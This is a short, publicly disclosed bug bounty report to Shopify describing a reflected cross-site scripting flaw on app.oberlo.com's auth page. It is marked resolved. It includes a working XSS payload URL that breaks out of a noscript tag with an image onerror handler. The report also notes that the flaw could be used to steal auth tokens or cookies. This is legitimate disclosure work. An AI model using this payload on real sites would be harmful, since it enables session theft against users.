Reflected XSS

Disclosed: 2019-05-28 16:12:49 By 0xprial To shopify
Low
Vulnerability Details
Hi team , I found a reflected xss on https://app.oberlo.com domain . ##Reproduce : * Visit **https://app.oberlo.com/auth?shop=%3C/noscript%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E** in latest version of firefox browser . * You will see popup like attacked screenshot : {F485407} **Tested in Latest version of firefox** ## Impact As this is a **auth** so this xss can lead to some serious issues like stealing users **auth** token or stealing browser data/cookies . Best Regards **Prial**
Actions
View on HackerOne
Report Stats
  • Report ID: 569241
  • State: Closed
  • Substate: resolved
  • Upvotes: 47
Share this report